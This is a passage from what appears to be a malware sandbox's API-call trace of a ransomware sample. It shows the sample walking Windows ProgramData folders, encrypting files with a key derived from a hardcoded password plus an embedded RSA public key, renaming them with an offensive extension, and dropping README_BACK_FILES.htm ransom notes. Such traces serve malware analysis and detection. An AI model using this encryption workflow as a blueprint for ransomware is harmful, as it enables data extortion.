phProv=0x2b9e404*=0x285b350) returned 1 [0238.300] CryptImportPublicKeyInfo (in: hCryptProv=0x285b350, dwCertEncodingType=0x1, pInfo=0x286a3c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a3f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a400*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27ea910) returned 1 [0238.300] CryptEncrypt (in: hKey=0x27ea910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0238.300] CryptEncrypt (in: hKey=0x27ea910, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844b28*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2844b28*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0238.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844b28, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.300] ReadFile (in: hFile=0xffffffff, lpBuffer=0x28839d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x28839d0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0238.300] CryptEncrypt (in: hKey=0x27eacd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28839d0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x28839d0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0238.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28839d0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0238.300] CloseHandle (hObject=0xffffffff) returned 1 [0238.300] CloseHandle (hObject=0xffffffff) returned 1 [0238.301] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.gsg"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"), bFailIfExists=0) returned 0 [0238.301] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", dwFileAttributes=0x0) returned 0 [0238.301] DeleteFileA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.gsg")) returned 0 [0238.301] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"), lpNewFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.fuck" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.fuck")) returned 0 [0238.301] CryptDestroyHash (hHash=0x27ea8d0) returned 1 [0238.301] CryptDestroyKey (hKey=0x27eacd0) returned 1 [0238.302] CryptReleaseContext (hProv=0x285ba38, dwFlags=0x0) returned 1 [0238.302] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0238.302] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.302] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\readme_back_files.htm")) returned 0xffffffff [0238.302] AreFileApisANSI () returned 1 [0238.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6a58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0238.302] CreateFileW (lpFileName="C:\\\\ProgramData\\regid.1991-06.com.microsoft\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.302] GetLastError () returned 0x5 [0238.302] GetLastError () returned 0x5 [0238.302] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.302] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\SoftwareDistribution\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27eac90 [0238.303] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.303] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0238.303] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.303] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\SoftwareDistribution\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\softwaredistribution\\readme_back_files.htm")) returned 0xffffffff [0238.303] AreFileApisANSI () returned 1 [0238.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd070, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0238.303] CreateFileW (lpFileName="C:\\\\ProgramData\\SoftwareDistribution\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\softwaredistribution\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.303] GetLastError () returned 0x5 [0238.303] GetLastError () returned 0x5 [0238.303] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.303] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Start Menu\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0xffffffff [0238.303] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Start Menu\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\start menu\\readme_back_files.htm")) returned 0xffffffff [0238.304] AreFileApisANSI () returned 1 [0238.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd028, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0238.304] CreateFileW (lpFileName="C:\\\\ProgramData\\Start Menu\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\start menu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.304] GetLastError () returned 0x5 [0238.304] GetLastError () returned 0x5 [0238.304] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.304] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Templates\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0xffffffff [0238.304] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Templates\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\templates\\readme_back_files.htm")) returned 0xffffffff [0238.304] AreFileApisANSI () returned 1 [0238.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39be90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0238.304] CreateFileW (lpFileName="C:\\\\ProgramData\\Templates\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\templates\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.305] GetLastError () returned 0x5 [0238.305] GetLastError () returned 0x5 [0238.305] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.305] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\USOPrivate\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27eac90 [0238.305] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.305] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.305] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27ea990 [0238.306] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.306] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.307] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.307] GetLastError () returned 0x5 [0238.307] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml")) returned 0x20 [0238.307] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", dwFileAttributes=0x80) returned 0 [0238.308] CreateFileA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.308] CreateFileA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.309] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg", dwFileAttributes=0x2) returned 1 [0238.309] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x285ba38) returned 1 [0238.312] CryptCreateHash (in: hProv=0x285ba38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.312] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.312] CryptHashData (hHash=0x27ea8d0, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.312] CryptDeriveKey (in: hProv=0x285ba38, Algid=0x6610, hBaseData=0x27ea8d0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27ead50) returned 1 [0238.312] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.312] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.312] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880748) returned 1 [0238.313] CryptImportPublicKeyInfo (in: hCryptProv=0x2880748, dwCertEncodingType=0x1, pInfo=0x286a978*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a9a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a9b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27eaa10) returned 1 [0238.313] CryptEncrypt (in: hKey=0x27eaa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.313] CryptEncrypt (in: hKey=0x27eaa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x287fa00*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x287fa00*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.314] WriteFile (in: hFile=0x5d10, lpBuffer=0x287fa00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x287fa00*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.315] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.315] CryptEncrypt (in: hKey=0x27ead50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.315] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.315] CloseHandle (hObject=0xffffffff) returned 1 [0238.315] CloseHandle (hObject=0x5d10) returned 1 [0238.319] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), bFailIfExists=0) returned 0 [0238.325] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", dwFileAttributes=0x0) returned 0 [0238.325] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg")) returned 1 [0238.326] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), lpNewFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.fuck" (normalized: "c:\\programdata\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.fuck")) returned 0 [0238.327] CryptDestroyHash (hHash=0x27ea8d0) returned 1 [0238.327] CryptDestroyKey (hKey=0x27ead50) returned 1 [0238.327] CryptReleaseContext (hProv=0x285ba38, dwFlags=0x0) returned 1 [0238.327] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.327] FindClose (in: hFindFile=0x27ea990 | out: hFindFile=0x27ea990) returned 1 [0238.327] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoprivate\\updatestore\\readme_back_files.htm")) returned 0xffffffff [0238.327] AreFileApisANSI () returned 1 [0238.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd4a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0238.327] CreateFileW (lpFileName="C:\\\\ProgramData\\USOPrivate\\UpdateStore\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoprivate\\updatestore\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0238.328] GetFileType (hFile=0x5d08) returned 0x1 [0238.328] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0238.329] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0238.329] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.329] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOPrivate\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoprivate\\readme_back_files.htm")) returned 0xffffffff [0238.329] AreFileApisANSI () returned 1 [0238.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0238.330] CreateFileW (lpFileName="C:\\\\ProgramData\\USOPrivate\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\usoprivate\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0238.330] GetFileType (hFile=0x5cdc) returned 0x1 [0238.330] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0238.331] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0238.331] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\USOShared\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27ea8d0 [0238.332] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.332] FindNextFileA (in: hFindFile=0x27ea8d0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.332] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27ea990 [0238.333] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.334] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.335] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.335] GetLastError () returned 0x0 [0238.335] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl")) returned 0x2020 [0238.335] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl", dwFileAttributes=0x80) returned 0 [0238.335] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.336] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.337] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.338] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880a78) returned 1 [0238.341] CryptCreateHash (in: hProv=0x2880a78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.341] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.341] CryptHashData (hHash=0x27eac90, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.341] CryptDeriveKey (in: hProv=0x2880a78, Algid=0x6610, hBaseData=0x27eac90, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27ead50) returned 1 [0238.341] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.341] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.341] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x287ffd8) returned 1 [0238.342] CryptImportPublicKeyInfo (in: hCryptProv=0x287ffd8, dwCertEncodingType=0x1, pInfo=0x286af28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286af58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286af60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28463e0) returned 1 [0238.342] CryptEncrypt (in: hKey=0x28463e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.342] CryptEncrypt (in: hKey=0x28463e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880968*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880968*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.342] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880968*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880968*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.343] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.343] CryptEncrypt (in: hKey=0x27ead50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.343] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.343] CloseHandle (hObject=0xffffffff) returned 1 [0238.343] CloseHandle (hObject=0x5d10) returned 1 [0238.344] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl"), bFailIfExists=0) returned 0 [0238.349] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl", dwFileAttributes=0x2000) returned 0 [0238.349] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl.gsg")) returned 1 [0238.350] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.001.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.fuck" (normalized: 